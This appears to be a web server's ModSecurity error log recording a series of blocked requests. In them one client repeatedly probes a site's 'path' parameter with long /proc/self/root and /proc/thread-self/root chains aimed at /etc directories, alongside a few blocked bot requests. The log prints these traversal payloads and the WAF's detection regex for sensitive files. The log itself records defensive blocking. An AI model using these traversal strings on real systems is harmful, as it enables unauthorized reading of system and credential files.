[Wed Mar 18 11:38:38.768802 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:37306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq47tY0UrI5A3LftIy4igAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:40.148093 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:41314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq48OyqAr6etmhZHNrLkAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:41.429669 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:41328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq48fu8EFLIOrSqIpsM7wAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:42.734066 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:41334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq48gkwaGbbGflqUZAY-wAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:44.031537 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:41348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq49Pu8EFLIOrSqIpsM9QAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:45.326964 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:41354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq49fu8EFLIOrSqIpsM-gAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:45.394250 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.228.61:52856] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq49da6ubjKNq_cu4ak7AAAA1Y"]
[Wed Mar 18 11:38:46.762920 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:41356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq49gkwaGbbGflqUZAZAQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:48.043603 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:41362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4-Na6ubjKNq_cu4ak7gAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:49.287021 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:41376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4-SmAPhZkrhU8w4l2pgAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:49.438030 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.244.43:55774] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq4-UzinOy1jxa1j4ce6gAAARg"]
[Wed Mar 18 11:38:50.534974 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:47364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4-vu8EFLIOrSqIpsNAQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:51.858105 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:47380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4-9Y0UrI5A3LftIy4lwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:54.332024 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:47384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4_sdf6f5d65gmYZTetwAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:55.627280 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:47396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4__u8EFLIOrSqIpsNAgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:38:56.943139 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:47408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5APu8EFLIOrSqIpsNBAAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:00.424332 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:47414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5BOyqAr6etmhZHNrLmwAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:01.820999 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:35664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Bda6ubjKNq_cu4ak_AAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:04.485771 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:35670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5COw_le52K8_3pV3pGgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:05.718615 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:35676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5Cfu8EFLIOrSqIpsNCQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:07.054945 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:35686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5C_u8EFLIOrSqIpsNDQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:08.463094 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:35698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5DCmAPhZkrhU8w4l2sQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:39:10.001985 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:43766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5DeyqAr6etmhZHNrLqgAAAEs"], referer: 